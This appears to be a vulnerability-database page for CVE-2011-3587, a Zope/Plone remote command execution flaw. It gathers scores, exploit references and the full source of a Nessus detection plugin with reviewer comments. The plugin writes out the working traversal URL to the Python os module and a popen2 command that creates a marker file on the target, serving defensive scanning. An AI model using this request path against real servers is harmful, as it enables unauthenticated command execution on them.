
CVSS 9.3 - CRITICAL
Attack vector
NETWORK
Attack complexity
MEDIUM
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
plone
zope
critical
nessus
exploit available
metasploit

Summary

Unspecified vulnerability in Zope 2.12.x and 2.13.x, as used in Plone 4.0.x through 4.0.9, 4.1, and 4.2 through 4.2a2, allows remote attackers to execute arbitrary commands via vectors related to the p_ class in OFS/misc_.py and the use of Python modules.

Exploit-Db

descriptionPlone and Zope Remote Command Execution PoC. CVE-2011-3587. Webapps exploit for multiple platforms
idEDB-ID:18262
last seen2016-02-02
modified2011-12-21
published2011-12-21
reporterNick Miles
sourcehttps://www.exploit-db.com/download/18262/
titlePlone and Zope Remote Command Execution PoC

Metasploit

descriptionUnspecified vulnerability in Zope 2.12.x and 2.13.x, as used in Plone 4.0.x through 4.0.9, 4.1, and 4.2 through 4.2a2, allows remote attackers to execute arbitrary commands via vectors related to the p_ class in OFS/misc_.py and the use of Python modules.
idMSF:EXPLOIT/MULTI/HTTP/PLONE_POPEN2
last seen2020-06-10
modified2017-07-24
published2011-12-27
references
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/plone_popen2.rb
titlePlone and Zope XMLTools Remote Command Execution

Nessus

NASL familyCGI abuses
NASL idPLONE_20110928.NASL
descriptionThe version of Plone hosted on the remote web server has a flaw that allows arbitrary access to Python modules. Using a specially crafted URL, this can allow an unauthenticated, remote attacker the ability to run arbitrary commands on the system through the Python 'os' module in the context of the 'Zope/Plone' service.
last seen2020-06-01
modified2020-06-02
plugin id57350
published2011-12-20
reporterThis script is Copyright (C) 2011-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/57350
titlePlone Request Parsing Remote Command Execution
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

# Plugin registration block: metadata, references and dependencies consumed
# by the Nessus engine. Everything in here is declarative; the actual check
# starts after the include() lines that follow this block.
if (description)
{
  script_id(57350);
  script_version("1.13");
  script_cvs_date("Date: 2018/11/15 20:50:18");

  # Identifiers this plugin reports against.
  script_cve_id("CVE-2011-3587");
  script_bugtraq_id(49857);

  script_name(english:"Plone Request Parsing Remote Command Execution");
  # This is an active check (a command is sent to the target), not a
  # version-string match -- see script_category(ACT_ATTACK) below.
  script_summary(english:"Tries to execute a command.");

  script_set_attribute(
    attribute:"synopsis",
    value:
"A web application on the remote host allows arbitrary remote code
execution."
  );
  script_set_attribute(
    attribute:"description",
    value:
"The version of Plone hosted on the remote web server has a flaw that
allows arbitrary access to Python modules.  Using a specially crafted
URL, this can allow an unauthenticated, remote attacker the ability to
run arbitrary commands on the system through the Python 'os' module in
the context of the 'Zope/Plone' service."
  );
  # Vendor advisory and hotfix references; the hotfix (Products.PloneHotfix20110928)
  # is the remediation named in the "solution" attribute.
  script_set_attribute(attribute:"see_also", value:"http://plone.org/products/plone/security/advisories/20110928");
  script_set_attribute(attribute:"see_also", value:"http://plone.org/products/plone-hotfix/releases/20110928");
  # http://zope2.zope.org/news/security-vulnerability-announcement-cve-2011-3587
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?b32a0de5");
  script_set_attribute(attribute:"see_also", value:"https://pypi.org/project/Products.PloneHotfix20110928/1.0/");
  script_set_attribute(attribute:"solution", value:"Follow the instructions in the advisory to apply the hotfix.");
  # NOTE(review): the plugin scores this as CVSS2 AV:N/AC:L/Au:N/C:P/I:P/A:P
  # (partial impacts), whereas the NVD record reproduced alongside this
  # script rates it 9.3 with AC:MEDIUM and COMPLETE C/I/A. The two vectors
  # disagree -- confirm which one downstream reporting should rely on.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  # NOTE(review): exploit_available is "false" here, yet the framework flags
  # just below (metasploit, canvas, d2_elliot) are all "true" and a public
  # PoC (EDB-ID 18262) and Metasploit module exist for this CVE. Looks
  # inconsistent -- confirm the intended value.
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"Plone RCE");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Plone and Zope XMLTools Remote Command Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'CANVAS');

# Disclosure and patch were published the same day (2011/09/28).
script_set_attribute(attribute:"vuln_publication_date", value:"2011/09/28");
  script_set_attribute(attribute:"patch_publication_date", value:"2011/09/28");
  script_set_attribute(attribute:"plugin_publication_date", value:"2011/12/20");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:plone:plone");
  # Marks the finding as confirmed by execution rather than by inference.
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  # ACT_ATTACK: scheduled in the attack phase; the main body modifies state
  # on the target (creates a file), so this is not a safe-checks plugin.
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.");

  # plone_detect.nasl populates the "www/plone" KB entry required below;
  # os_fingerprint.nasl supplies "Host/OS", which the main body reads to
  # decide which command variant(s) to send.
  script_dependencies("plone_detect.nasl", "os_fingerprint.nasl");
  # Honour the global "disable CGI scanning" setting.
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_keys("www/plone");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("http.inc");
include("misc_func.inc");
include("webapp_func.inc");
include("url_func.inc");

# ---------------------------------------------------------------------------
# Active check. Flow:
#   1. locate the Plone install recorded in the KB by plone_detect.nasl;
#   2. confirm that traversal to the Python 'os' module is exposed;
#   3. send a file-creation command through popen2 and look for the
#      telltale response;
#   4. report, listing the requests made and the marker file to look for.
# Every HTTP step uses exit_on_fail:TRUE, so a transport failure aborts the
# plugin without a finding.
# NOTE(review): a successful run leaves a marker file on the target (see
# verify_instructions below); nothing in this script removes it, and the
# unixtime() suffix means each scan creates a new one.
# ---------------------------------------------------------------------------

# Get details of Plone install.
port = get_http_port(default:80);

# "dir" is the web path under which Plone was detected.
install = get_install_from_kb(appname:"plone", port:port, exit_on_fail:TRUE);
dir = install["dir"];

# Verify the vuln exists (regardless of whether we can exploit it)
# Traversal path that reaches the 'os' module through the p_ class; this
# request only reads, it does not execute anything yet.
os_module = "p_/webdav/xmltools/minidom/xml/sax/saxutils/os";
url = dir + "/" + os_module;

res = http_send_recv3(
  method       : "GET",
  item         : url,
  port         : port,
  exit_on_fail : TRUE
);

# ">!<" is NASL's "does not contain". The expected body is the Python repr
# of the module object; anything else means the traversal is blocked
# (hotfix applied or unaffected version) and we stop with no finding.
if ("<module 'os' from '" >!< res[2])
  exit(0, "The Plone installation at " + build_url(port:port, qs:dir) + " is not affected.");

# it looks like only Unix Systems have popen2 compiled in,
# so this shouldn't work on Windows - but we can try anyways
# Marker file name carries the plugin name and a timestamp so it is
# attributable and unique per run. Both commands are URL-encoded because
# they travel in the query string.
file_name = SCRIPT_NAME + "-" + unixtime();
unix_command = urlencode(str:"touch /tmp/"+ file_name);
windows_command = urlencode(str:"echo " + SCRIPT_NAME + " > %windir%/temp/"+file_name);

# Single-quoted NASL strings interpret '\n'; this text is appended to the
# report so an operator can confirm the marker (and clean it up).
verify_instructions =
'An attempt was made to create a temporary file on the remote host.\n'+
'You can verify its existence by checking for it at the following\n'+
'path';

# Choose which command(s) to send. When the OS is fingerprinted and the scan
# is not paranoid, only the matching variant is used; otherwise both are
# tried. Note the Windows branch still sends the Unix command as well.
os = get_kb_item("Host/OS");
if (os && report_paranoia < 2)
{
  if ("Windows" >< os)
  {
    commands = make_list(unix_command, windows_command);
    verify_instructions += 's:\n\n';
    # NOTE(review): the command writes under %windir%, but the instructions
    # list two fixed paths; on a non-default system root the marker would be
    # elsewhere -- confirm this is acceptable.
    verify_instructions += '  C:\\Windows\\temp\\' + file_name + '\n';
    verify_instructions += '  C:\\Winnt\\temp\\' + file_name + '\n';
  }
  else
  {
    commands = make_list(unix_command);
    verify_instructions += ':\n\n';
    verify_instructions += '  /tmp/' + file_name + '\n';
  }
}
else {
  commands = make_list(unix_command, windows_command);
  verify_instructions += 's (dependent on host operating system):\n\n';
  verify_instructions += '  /tmp/' + file_name + '\n';
  verify_instructions += '  C:\\Windows\\temp\\' + file_name + '\n';
  verify_instructions += '  C:\\Winnt\\temp\\' + file_name + '\n';
}

# Exploitation attempt. Each URL sent is recorded for the report.
command_success = FALSE;
url_list = make_list();

foreach command (commands)
{
  url = dir + "/" + os_module + "/popen2?cmd=" + command;
  url_list = make_list(url_list, url);
  res = http_send_recv3(
    method       : "GET",
    item         : url,
    port         : port,
    exit_on_fail : TRUE
  );

  # Success marker: presumably the repr of the file object popen2 returns.
  # A single hit is enough; the loop still sends every remaining command.
  if ("<open file '<fdopen>'" >< res[2]) command_success = TRUE;
}

# Reporting. The finding is raised in either case because the traversal to
# the 'os' module was already confirmed above; verbosity only controls
# whether the request list and verification instructions are attached.
if (report_verbosity > 0)
{
  if (command_success)
  {
    report = '\nNessus was allowed to execute commands on the remote host.\n' +
    'The following requests were made:\n\n';
    foreach url (url_list)
      report += '  ' + build_url(qs:url, port:port) + '\n';
    report += '\n' + verify_instructions;
  }
  else
  {
    report = '\nNessus was able to determine that the vulnerability exists on the\n' +
    'remote host, but was not able to successfully exploit it.\n';
  }
  security_hole(port:port, extra:report);
}
else security_hole(port);

Packetstorm

Saint

bid49857
descriptionPlone Zope SAXutils Command Execution
osvdb76105
titleplone_zope_saxutils_cmd_exec
typeremote

Seebug

  • bulletinFamilyexploit
    descriptionBUGTRAQ ID: 49857 CVE ID: CVE-2011-3587 Zope是一个开源的web应用服务器,主要用python写成 Zope在实现上存在远程命令执行漏洞,非法攻击者可利用此漏洞部署特制的Web请求并以Zope/Plone服务权限执行任意命令 0 Zope 2.13.9 Zope 2.13.8 Zope 2.13 Zope 2.12.19 Zope 2.12 Plone 4.x 厂商补丁: Zope ---- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.zope.org/
    idSSV:26110
    last seen2017-11-19
    modified2011-12-26
    published2011-12-26
    reporterRoot
    sourcehttps://www.seebug.org/vuldb/ssvid-26110
    titleZope框架"cmd"参数远程命令执行漏洞
  • bulletinFamilyexploit
    descriptionBUGTRAQ ID: 49857 CVE ID: CVE-2011-3587 Zope是一个开源的web应用服务器,主要用python写成 Zope在实现上存在远程命令执行漏洞,非法攻击者可利用此漏洞部署特制的Web请求并以Zope/Plone服务权限执行任意命令 0 Zope 2.13.9 Zope 2.13.8 Zope 2.13 Zope 2.12.19 Zope 2.12 Plone 4.x 厂商补丁: Zope ---- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.zope.org/
    idSSV:72431
    last seen2017-12-25
    modified2014-07-01
    published2014-07-01
    reporterRoot
    sourcehttps://www.seebug.org/vuldb/ssvid-72431
    titlePlone and Zope Remote Command Execution PoC